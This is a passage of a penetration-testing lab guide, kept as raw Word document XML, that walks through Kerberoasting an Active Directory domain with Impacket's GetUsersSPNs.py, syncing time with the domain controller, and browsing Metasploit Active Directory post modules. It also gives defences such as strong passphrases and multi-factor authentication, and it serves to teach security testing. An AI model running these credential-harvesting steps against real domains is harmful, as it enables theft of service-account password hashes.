            <wp:extent cx="4476750" cy="1719580"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="211016760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76750" cy="1719580"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="584DEA85" w14:textId="48A9F849"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89F299F">
          <v:shape id="_x0000_i1291" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId109" w:name="DefaultOcxName66" w:shapeid="_x0000_i1291"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Save the file, and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>enter </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/GetUsersSPNs.py -request LPT.com/CPENT</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>. The results of the output of this command are shown in the following screenshot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402ADF6F" w14:textId="644A4DA9"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6D0C9AC4" wp14:editId="20F14E01">
            <wp:extent cx="5400040" cy="2390140"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="191541050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noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CA8D79" w14:textId="2B7AD18C"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79A4186">
          <v:shape id="_x0000_i1290" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId111" w:name="DefaultOcxName67" w:shapeid="_x0000_i1290"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>If you get the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Clock error</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>, it is because time </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>synchronization</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> is very important in </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Kerberos</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>. Therefore, change the time of your Parrot machine to match that of the Domain Controller and try again. However, it will still fail, so the best method is to sync with the Domain Controller. Enter the commands shown in the following screenshot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A2473B" w14:textId="2E6281B0"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13D06FF3" wp14:editId="115614A4">
            <wp:extent cx="5400040" cy="272415"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="180740485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272415"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9367F8" w14:textId="1A1775A0"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3E636E95">
          <v:shape id="_x0000_i1289" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId113" w:name="DefaultOcxName68" w:shapeid="_x0000_i1289"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>This syncs the time. Run the command again. An example of the output is shown in the following screenshot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E085E26" w14:textId="6509F4AE"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0796118A" wp14:editId="5054ECB6">
            <wp:extent cx="5400040" cy="2328545"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="191710270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2328545"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1210B578" w14:textId="5C16A496"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232B9295">
          <v:shape id="_x0000_i1288" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId115" w:name="DefaultOcxName69" w:shapeid="_x0000_i1288"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">This was much easier than trying to do it on the actual machine. As long as we have the credentials of a user, we can use this route as well. It is important to understand that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Kerberoasting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> collects the service accounts along with their correlating password hash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260E7205" w14:textId="030B3DFB"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9A3217D">
          <v:shape id="_x0000_i1287" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId116" w:name="DefaultOcxName70" w:shapeid="_x0000_i1287"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">It is possible to reverse these hashes in a relatively short duration if the password is based on a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>weakly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> defined word. Enterprises should review their own service accounts in Active Directory to verify if they are actually necessary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1338F0DA" w14:textId="293A714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2489D90">
          <v:shape id="_x0000_i1286" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId117" w:name="DefaultOcxName71" w:shapeid="_x0000_i1286"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>The service accounts that are required should be set with a complex non-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>dictionary based</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7C962B" w14:textId="172C6E70"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16D17F65">
          <v:shape id="_x0000_i1285" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId118" w:name="DefaultOcxName72" w:shapeid="_x0000_i1285"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>In our testing engagements, we want our clients to realize that when they use strong passwords or pass phrases, this cracking will take a long time. Another method is to set up multi-factor authentication, which is a deterrent as well.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6899A139" w14:textId="52FE0FD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E11169C">
          <v:shape id="_x0000_i1284" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId119" w:name="DefaultOcxName73" w:shapeid="_x0000_i1284"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Next, we will look at the capability of enumeration and exploiting Active Directory with Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CAEAFC" w14:textId="39FFC2DA"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lastRenderedPageBreak/>
        <w:object w:dxaOrig="1440" w:dyaOrig="1440" w14:anchorId="709D6577">
          <v:shape id="_x0000_i1283" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId120" w:name="DefaultOcxName74" w:shapeid="_x0000_i1283"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>As is apparent throughout this section, we must have access on a machine within the Active Directory to perform the best possible and most complete enumeration of Active Directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA5B93C" w14:textId="3A1DD801"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14A7DBD">
          <v:shape id="_x0000_i1282" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId121" w:name="DefaultOcxName75" w:shapeid="_x0000_i1282"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>In your Parrott machine, startup the Metasploit tool by entering the following two commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC01E05" w14:textId="77777777" w:rsidR="00D05942" w:rsidRPr="00D05942" w:rsidRDefault="00D05942" w:rsidP="00D05942">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D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">service </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>postgresql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784C7CE1" w14:textId="77777777" w:rsidR="00D05942" w:rsidRPr="00D05942" w:rsidRDefault="00D05942" w:rsidP="00D05942">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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="295FC67D" w14:textId="1D5B4463"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01C6B114">
          <v:shape id="_x0000_i1281" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId122" w:name="DefaultOcxName76" w:shapeid="_x0000_i1281"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Once the console loads, enter </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>activedirectory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>. An example of the results of the search is shown in the following screenshot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4E81E6" w14:textId="05AB07BF"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3E83F195" wp14:editId="5B2DC352">
            <wp:extent cx="5400040" cy="1300480"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="58560238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1300480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DA4241" w14:textId="41642A3F"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6D7A623">
          <v:shape id="_x0000_i1280" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId124" w:name="DefaultOcxName77" w:shapeid="_x0000_i1280"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">As the above screenshot shows, we have the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Impacket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool as well here. However, let us first look at the post module. Enter that, and then enter </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>info</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> to read about the module. An example of the output from the command is shown in the following screenshot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202C6818" w14:textId="2318F686"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7A0D88B8" wp14:editId="254A011A">
            <wp:extent cx="5400040" cy="2588260"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="85528830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00040" cy="2588260"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A22833" w14:textId="2C60B44D"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7442EC48">
          <v:shape id="_x0000_i1279" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId126" w:name="DefaultOcxName78" w:shapeid="_x0000_i1279"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>As the above screenshot shows, we can use this once we get our access shell. Let us now look at the next module. An example of the output of the command is shown in the following screenshot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01ED114F" w14:textId="6AE2B909"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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="466F86A9" wp14:editId="4C90D25B">
            <wp:extent cx="5400040" cy="1139190"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="97191876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1139190"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBDC2EF" w14:textId="631D9873"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F8DC8A7">
          <v:shape id="_x0000_i1278" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId128" w:name="DefaultOcxName79" w:shapeid="_x0000_i1278"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>An example of the info command is shown in the following screenshot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EC56B8" w14:textId="24E96C92" w:rsidR="00D05942" w:rsidRPr="00D05942" w:rsidRDefault="00D05942" w:rsidP="00D05942">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noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D577E8B" wp14:editId="03350ABB">
            <wp:extent cx="5400040" cy="2972435"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7638996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0040" cy="2972435"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C7A00C" w14:textId="601180BF"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609E6619">
          <v:shape id="_x0000_i1277" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId130" w:name="DefaultOcxName80" w:shapeid="_x0000_i1277"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>As we can see, we have quite a bit of information that the module can extract. As with most of these modules, we need to do this from a compromised machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26539F9D" w14:textId="6EF1F05C"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37BFB17D">
          <v:shape id="_x0000_i1276" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId131" w:name="DefaultOcxName81" w:shapeid="_x0000_i1276"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>We have explored a variety of Active Directory attacks. The key here, similar to other newer attacks, is that credentials as well as access to a machine within the domain is required. Note that we performed all these attacks without using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
